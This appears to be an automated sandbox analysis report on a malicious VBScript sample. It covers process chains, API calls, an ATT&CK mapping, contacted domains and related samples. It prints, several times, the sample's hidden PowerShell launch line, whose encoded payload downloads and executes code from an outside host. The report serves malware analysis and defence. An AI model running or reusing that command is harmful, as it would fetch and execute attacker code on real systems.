Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8aywbvag0abqb1ag4aaqbjageababpag4aawauagmabwbtac8aaqbuagqazqb4ac4acaboahaaigapaa==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8aywbvag0abqb1ag4aaqbjageababpag4aawauagmabwbtac8aaqbuagqazqb4ac4acaboahaaigapaa==	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8aywbvag0abqb1ag4aaqbjageababpag4aawauagmabwbtac8aaqbuagqazqb4ac4acaboahaaigapaa==	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe "C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00C7C6D0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorDacl,GetLastError,LocalFree,LocalFree,

4_2_00C7C6D0

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00C7C870 DeleteObject,AllocateAndInitializeSid,AllocateAndInitializeSid,GetLastError,GetLastError,GetLastError,

4_2_00C7C870

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_00CF90E5
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: GetLocaleInfoW,	4_2_00CF903E
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: GetLocaleInfoW,	4_2_00CF91EB
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: EnumSystemLocalesW,	4_2_00CF35C5
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: GetDesktopWindow,GetClientRect,CreateWindowExW,GetLastError,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetWindowRect,GetClientRect,SetWindowPos,CreateBitmap,CreateCaret,SetScrollInfo,GetDoubleClickTime,GetSystemMenu,CreatePopupMenu,AppendMenuA,AppendMenuA,AppendMenuA,CreateMenu,DeleteMenu,DeleteMenu,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,GetKeyboardLayout,GetLocaleInfoA,ShowWindow,SetForegroundWindow,GetForegroundWindow,UpdateWindow,PeekMessageW,IsWindow,PeekMessageA,GetForegroundWindow,MsgWaitForMultipleObjects,DispatchMessageW,PeekMessageW,IsWindow,IsDialogMessageA,	4_2_00C448D7
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_00CF897B
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: EnumSystemLocalesW,	4_2_00CF8BD1
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: GetLocaleInfoA,DefWindowProcW,	4_2_00C41B3F
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_00CF8C6C
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: EnumSystemLocalesW,	4_2_00CF8EBF
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: GetLocaleInfoW,	4_2_00CF2E77
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: EnumSystemLocalesW,	4_2_00CF8FF3
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: GetLocaleInfoW,	4_2_00CF8F1E

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00CDEE35 cpuid

4_2_00CDEE35

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00CCF5F0 ___from_strstr_to_strchr,CreateNamedPipeA,CreateEventA,GetLastError,

4_2_00CCF5F0

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00C896E0 GetLocalTime,

4_2_00C896E0

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00D041E6 GetTimeZoneInformation,

4_2_00D041E6

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00C7CDF0 GetVersionExA,GetProcAddress,

4_2_00C7CDF0

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00CA7050 GetProcAddress,___from_strstr_to_strchr,GetUserNameA,GetUserNameA,

4_2_00CA7050

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C764A0 socket,SetHandleInformation,_strncpy,setsockopt,inet_addr,htonl,htonl,getaddrinfo,htons,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,		4_2_00C764A0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C75FB0 closesocket,socket,SetHandleInformation,setsockopt,setsockopt,setsockopt,htonl,htons,bind,WSAGetLastError,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError,		4_2_00C75FB0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Command and Scripting Interpreter	Path Interception	12 Process Injection	21 Virtualization/Sandbox Evasion	11 Input Capture	2 System Time Discovery	Remote Services	11 Input Capture	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	221 Scripting	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	12 Process Injection	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	6 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	12 Clipboard Data	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	221 Scripting	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	11 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 File and Directory Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	34 System Information Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
client_3.vbs	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	3%	ReversingLabs

Source	Detection	Scanner	Label
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://the.earth.li(	0%	Avira URL Cloud	safe
http://communicalink.com	0%	Avira URL Cloud	safe
http://communicalink.com/index.php	0%	Avira URL Cloud	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	Avira URL Cloud	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
the.earth.li	93.93.131.124	true	false		high
communicalink.com	104.21.75.133	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://the.earth.li/~sgtatham/putty/0.79/w32/putty.exe	false		high
http://communicalink.com/index.php	false	Avira URL Cloud: safe	unknown
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.958131745.000001565F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.958131745.000001565F65B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015651055000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	OgUpjXaY.exe.3.dr	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.944407584.000001564F81D000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.944407584.000001564F81D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000003.00000002.944407584.000001565021D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000003.00000002.944407584.0000015651055000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000003.00000002.944407584.0000015651055000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	OgUpjXaY.exe.3.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	OgUpjXaY.exe.3.dr	false	URL Reputation: safe	unknown
https://the.earth.li(	powershell.exe, 00000003.00000002.944407584.0000015650C8B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.944407584.000001564F81D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	false	URL Reputation: safe	unknown
http://the.earth.li	powershell.exe, 00000003.00000002.944407584.0000015650C6A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://communicalink.com	powershell.exe, 00000003.00000002.944407584.0000015650BF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.000001565092A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650BEE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	OgUpjXaY.exe.3.dr	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/	OgUpjXaY.exe, OgUpjXaY.exe, 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmp, OgUpjXaY.exe, 00000004.00000000.901523116.0000000000D07000.00000002.00000001.01000000.00000006.sdmp, OgUpjXaY.exe, 00000004.00000003.902845541.0000000003941000.00000004.00000020.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	false	Avira URL Cloud: safe	unknown
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exeX	powershell.exe, 00000003.00000002.944407584.0000015650C1C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000003.00000002.944407584.0000015651055000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.958131745.000001565F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.958131745.000001565F65B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://the.earth.li	powershell.exe, 00000003.00000002.944407584.0000015650C1C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000003.00000002.944407584.000001564F5F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.944407584.000001564F5F1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.75.133	communicalink.com	United States		13335	CLOUDFLARENETUS	false
93.93.131.124	the.earth.li	United Kingdom		44684	MYTHICMythicBeastsLtdGB	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1320445
Start date and time:	2023-10-05 18:47:11 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	client_3.vbs
Detection:	MAL
Classification:	mal96.spyw.evad.winVBS@8/4@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 91% Number of executed functions: 22 Number of non-executed functions: 249
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6720 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: client_3.vbs

Simulations

Behavior and APIs

Time	Type	Description
18:48:00	API Interceptor	42x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
93.93.131.124	doc.doc	Get hash	malicious	Unknown	Browse	the.earth.li/~sgtatham/putty/latest/w64/putty.exe
93.93.131.124	lmfao.doc	Get hash	malicious	Unknown	Browse	the.earth.li/~sgtatham/putty/0.63/x86/pscp.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
the.earth.li	Informazion.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	827837hj.xls	Get hash	malicious	Unknown	Browse	93.93.131.124
	doc.doc	Get hash	malicious	Unknown	Browse	93.93.131.124
	https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msi	Get hash	malicious	Unknown	Browse	93.93.131.124
	1mixELaybY.exe	Get hash	malicious	vkeylogger	Browse	93.93.131.124
	smphost.dll	Get hash	malicious	Unknown	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	Microsoft Excel.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	Microsoft Excel.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	lmfao.doc	Get hash	malicious	Unknown	Browse	93.93.131.124
	YOeg64zDX4.exe	Get hash	malicious	AZORult	Browse	93.93.131.124
	payload.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	do7ZLDDsHX.xls	Get hash	malicious	Unknown	Browse	93.93.131.124
	m.doc	Get hash	malicious		Browse	46.43.34.31
	m.doc	Get hash	malicious		Browse	46.43.34.31
	m.doc	Get hash	malicious		Browse	46.43.34.31
	Your_Invoice_4886.doc	Get hash	malicious		Browse	46.43.34.31
	Your_Invoice_4886.doc	Get hash	malicious		Browse	46.43.34.31

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MYTHICMythicBeastsLtdGB	Informazion.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	827837hj.xls	Get hash	malicious	Unknown	Browse	93.93.131.124
	7XlWWSA2LU.dll	Get hash	malicious	Wannacry	Browse	93.93.132.33
	section_228_highways_agreement 34377.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	dfas_telework_agreement 20731.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	private_child_support_agreement_template 17845.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	making_a_contract_legally_binding_30040.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	illegalargumentexception_comparison_method_violates_its_general_contra 70051.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	electrical_contractor_agreement_template 5445.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	gootloader_stage1.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	difference_between_service_contract_and_employment_contract 98116.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	print_scheduling_agreement_sap 4874.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	chase_heloc_subordination_form 86327.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	doc.doc	Get hash	malicious	Unknown	Browse	93.93.131.124
	https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msi	Get hash	malicious	Unknown	Browse	93.93.131.124
	1mixELaybY.exe	Get hash	malicious	vkeylogger	Browse	93.93.131.124
	smphost.dll	Get hash	malicious	Unknown	Browse	93.93.131.124
	arm7	Get hash	malicious	Mirai Moobot	Browse	46.235.224.242
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
CLOUDFLARENETUS	https://bodegasberamendi.com/wp-includes/fonts/?username=Y2hyaXN0Y2h1cmNoQHJ1bmFjcmVzLmNvLm56	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	http://www.auctiva.com/email/ta.aspx?uid=1972697&sid=0&eid=896379865&mid=14&aid=-1&ein=141929408795&dest=//kob6yzzyslej.lamarque.com.ar/z8lthhw/amFjb2Iuam9yZ2Vuc2VuQGdlbGl0YS5jb20=&hyhupsgz	Get hash	malicious	Unknown	Browse	104.17.2.184
	Setup_win64_5.49.1031-release.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.208.220
	https://selligenttier.naylorcampaigns.com/track?type=click&enid=ZWFzPTEmbXNpZD0mYXVpZD0mbWFpbGluZ2lkPTYyNDExMiZtZXNzYWdlaWQ9NjI0MTEyJmRhdGFiYXNlaWQ9NjI0MTEyJnNlcmlhbD0xNjgyODQwNyZlbWFpbGlkPVRpbUBFbGV2YXRlZGNnLmNvbSZ1c2VyaWQ9MjExMTg2JnRhcmdldGlkPSZtbj0mZmw9Jm12aWQ9JmV4dHJhPSYmJg==&&&9999&&&https://carsinsu.com/BCdsW3/tz3nhx/amRwZWFjb2NrQGNsZXJrb2Zjb3VydHMuY2M=	Get hash	malicious	Unknown	Browse	104.21.19.75
	https://v2lutrcswlttuy.z1.web.core.windows.net/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	z3recAeWcY.exe	Get hash	malicious	Ursnif, Strela Stealer	Browse	172.67.181.91
	file.exe	Get hash	malicious	FormBook	Browse	172.67.132.228
	https://clicksmail.medscape.org/e-t-p?clientId=7000929&sendId=5475311&subscriberId=MjUxNDM2MzM=&istId=istId&eventDate=2023-05-2923:00:39&eventType=article_link_click&sendUrlId=sendUrlId&urlId=urlId&alias=alias&batchId=batchId&triggeredSendExternalKey=ese-prod-5008584-perform-key&url=http%3A%2F%2Fmyubow.fvvrj.laim.mn%2FdGF4ZGVlZHNAb2thbG9vc2FjbGVyay5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.3.184
	https://u7917333.ct.sendgrid.net/ls/click?upn=YGB-2BZSImvMUGBgb4XYQSXYLKsvJ4QrsHJDIpENLKxXM2JkolcDzj0CHJvdpeplaxsH99cbqkLAs-2Fcf8RmBjy8G5ZP2mu44gQwBXyOjj-2FP0Zctu-2FtTHRHV9VQheGPdu5EMZfz_BJOfvCRRlqISoLxrJliZI9RaHwsjwocnxbjDAl1bbrp1M3X1cKxHQbp9dov10OEZ2a4Ms2BVGwIQbV7pc2Gl3moyiRhdoXD9Y95V9ZK1IpM-2Fd0RTjZoAqbP-2FZ1vWM7yydGHSUntKEdeZbgUpw83BD8B6nbEnGL0iVtoXbrHh9xdzCPppuG73fyokP3YYZA5oKG6h3-2BD9LbjVPIZpGPRQyD6A-2Fpp9HyEYUQmu19RP1k4-3D	Get hash	malicious	Unknown	Browse	104.17.2.184
